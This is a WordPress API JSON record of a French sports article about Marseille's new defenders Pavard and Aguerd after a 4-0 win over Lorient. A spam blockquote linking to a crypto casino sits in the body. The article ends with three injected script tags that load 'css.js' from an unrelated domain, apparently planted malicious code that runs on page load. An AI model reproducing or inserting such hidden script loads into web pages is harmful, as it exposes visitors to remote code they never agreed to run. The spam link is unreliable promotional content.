{"id":4001,"date":"2025-11-20T03:56:09","date_gmt":"2025-11-20T03:56:09","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4001"},"modified":"2026-02-02T22:10:26","modified_gmt":"2026-02-02T22:10:26","slug":"om-pavard-et-aguerd-lancent-une-nouvelle-ere-defensive-a-lom","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-pavard-et-aguerd-lancent-une-nouvelle-ere-defensive-a-lom\/","title":{"rendered":"OM &#8211; Pavard et Aguerd lancent une nouvelle \u00e8re d\u00e9fensive \u00e0 l\u2019OM ?"},"content":{"rendered":"<h1>OM &#8211; Pavard et Aguerd lancent une nouvelle \u00e8re d\u00e9fensive \u00e0 l\u2019OM ?<\/h1>\n<h2 data-prevent-delete=\"true\">La Ligue 1 retrouve son \u00e9lan de septembre entre d\u00e9sillusions et nouveaux espoirs<\/h2>\n<p>La <strong>Ligue 1<\/strong> effectue sa v\u00e9ritable rentr\u00e9e de septembre, marqu\u00e9e par la fin du mercato estival et le d\u00e9but d\u2019un nouveau cycle. Alors que certains clubs voient d\u00e9j\u00e0 leurs promesses estivales s\u2019envoler, d\u2019autres, comme l\u2019<strong>Olympique de Marseille<\/strong>, profitent de l\u2019\u00e9lan des recrues pour rallumer l\u2019enthousiasme. Vendredi, face \u00e0 <strong>Lorient<\/strong>, les nouvelles recrues <strong>Benjamin Pavard<\/strong>, <strong>Angel Gomes<\/strong>, <strong>Timothy Weah<\/strong> et <strong>Nayef Aguerd<\/strong> ont particip\u00e9 \u00e0 un large succ\u00e8s (4-0).<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-bourse.com\/casino-bourse\/\" target=\"_blank\" rel=\"dofollow\">casino bourse<\/a><\/strong> &#8211; Vous recherchez un casino en ligne \u00e0 la fois fiable, moderne et capable de r\u00e9pondre aux besoins des utilisateurs de cryptomonnaies\u202f? Vous vous demandez si<\/p><\/blockquote>\n<p>En ce d\u00e9but de saison, le d\u00e9calage entre attentes et r\u00e9alit\u00e9s est flagrant. Les supporters se souviennent de l\u2019\u00e9t\u00e9, o\u00f9 <strong>Georges Mikautadze<\/strong> incarnait les espoirs lyonnais, <strong>Adrien Rabiot<\/strong> portait les couleurs de l\u2019OM, <strong>Paul Pogba<\/strong> \u00e9tait annonc\u00e9 comme figure mon\u00e9gasque et <strong>Ousmane Demb\u00e9l\u00e9<\/strong> illuminait le projet parisien. Mais Mikautadze et Rabiot ne sont plus visibles, Pogba n\u2019a pas encore jou\u00e9, et Demb\u00e9l\u00e9 s\u2019est bless\u00e9 avec l\u2019\u00e9quipe de France, laissant le <strong>PSG<\/strong> dans l\u2019incertitude.<\/p>\n<p><em>L\u2019amoureux de la L1 ne va pas hurler \u00e0 la publicit\u00e9 mensong\u00e8re<\/em>, \u00e9crit <strong>Anthony Cl\u00e9ment<\/strong>, car il sait que le championnat ne d\u00e9pend pas uniquement de ses vedettes. Le feuilleton continue, malgr\u00e9 les absents et les d\u00e9sillusions. Le mercato devient m\u00eame, pour certains clubs, un spectacle permanent, \u00e0 l\u2019image de l\u2019OM o\u00f9 l\u2019arriv\u00e9e des joueurs \u00e0 l\u2019a\u00e9roport est v\u00e9cue comme un \u00e9v\u00e9nement, entretenu par une ferveur populaire inalt\u00e9rable.<\/p>\n<p>Ce cycle de renouveau marseillais illustre la dynamique d\u2019un championnat o\u00f9 chaque mois de septembre entretient l\u2019illusion du possible. La victoire contre Lorient et l\u2019int\u00e9gration des recrues alimentent l\u2019espoir d\u2019une saison meilleure. Comme le rappelle l\u2019article, <em>\u00ab tout est ouvert et on aura bien assez le temps d\u2019\u00eatre d\u00e9\u00e7u \u00bb<\/em>. La L1 se relance donc entre espoirs retrouv\u00e9s, incertitudes persistantes et l\u2019\u00e9ternelle passion des tribunes.<\/p>\n<h2 data-prevent-delete=\"true\">Pavard et Aguerd lancent une nouvelle \u00e8re d\u00e9fensive \u00e0 l\u2019OM<\/h2>\n<p>La victoire de l\u2019<strong>OM<\/strong> face \u00e0 <strong>Lorient<\/strong> (4-0) a offert un premier aper\u00e7u encourageant de la nouvelle charni\u00e8re centrale form\u00e9e par <strong>Benjamin Pavard<\/strong> et <strong>Nayef Aguerd<\/strong>. Les deux recrues estivales ont affich\u00e9 une solidit\u00e9 qui pourrait rebattre les cartes en d\u00e9fense, o\u00f9 la place de <strong>Leonardo Balerdi<\/strong> est d\u00e9sormais en question. Rest\u00e9 sur le banc apr\u00e8s un retour tardif d\u2019Argentine, le d\u00e9fenseur pourrait voir sa hi\u00e9rarchie \u00e9voluer, m\u00eame si <strong>Roberto De Zerbi<\/strong> assure que <em>\u00ab Balerdi est un joueur de tr\u00e8s gros calibre, d\u00e9terminant. Il sera sur le terrain ou sur le banc, quand il le m\u00e9ritera \u00bb<\/em>.<\/p>\n<p>La rencontre face \u00e0 Lorient, marqu\u00e9e par la premi\u00e8re apparition r\u00e9ussie du gardien n\u00e9erlandais <strong>Jeffrey De Lange<\/strong>, n\u2019a pas constitu\u00e9 un test grandeur nature, tant l\u2019adversaire s\u2019est montr\u00e9 limit\u00e9 offensivement. Mais pour l\u2019OM, qui avait encaiss\u00e9 quatre buts lors des trois premi\u00e8res journ\u00e9es, cette premi\u00e8re solidit\u00e9 d\u00e9fensive est accueillie comme une bonne nouvelle. Le sch\u00e9ma hybride de De Zerbi, \u00e0 quatre derri\u00e8re en phase d\u00e9fensive et \u00e0 trois lors de la relance, a permis d\u2019int\u00e9grer efficacement les recrues, tout en laissant planer des incertitudes sur l\u2019avenir de certains cadres.<\/p>\n<p>L\u2019entra\u00eeneur italien, satisfait de ses nouvelles options, a rappel\u00e9 que <em>\u00ab ceux qui ne sont pas en forme ou traversent une passe difficile iront s\u2019asseoir \u00bb<\/em>. Le tandem Pavard-Aguerd, en plus d\u2019avoir marqu\u00e9 lors de ses d\u00e9buts, a impressionn\u00e9 par sa compl\u00e9mentarit\u00e9 rapide. <strong>De Lange<\/strong> souligne particuli\u00e8rement l\u2019apport de Pavard : <em>\u00ab Il voit tout ce qui va arriver, il guide tout le monde, il nous rassure. On voit tout de suite que c\u2019est un top joueur \u00bb<\/em>.<\/p>\n<p>Conscient des d\u00e9fis \u00e0 venir, Pavard a toutefois temp\u00e9r\u00e9 l\u2019enthousiasme : <em>\u00ab Tout ne sera pas parfait tout de suite\u2026 On y arrivera petit \u00e0 petit avec le travail et les matches \u00bb<\/em>. Une prudence de bon augure, alors que l\u2019OM s\u2019appr\u00eate \u00e0 d\u00e9fier le <strong>Real Madrid<\/strong> de <strong>Kylian Mbapp\u00e9<\/strong>, puis le <strong>PSG<\/strong> au V\u00e9lodrome, deux rendez-vous qui permettront de jauger r\u00e9ellement la nouvelle assise d\u00e9fensive olympienne.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; Pavard et Aguerd lancent une nouvelle \u00e8re d\u00e9fensive \u00e0 l\u2019OM ? La Ligue 1 retrouve son \u00e9lan de septembre entre d\u00e9sillusions et nouveaux espoirs La Ligue 1 effectue&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4001","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4001"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4001\/revisions"}],"predecessor-version":[{"id":14864,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4001\/revisions\/14864"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4001"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4001"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}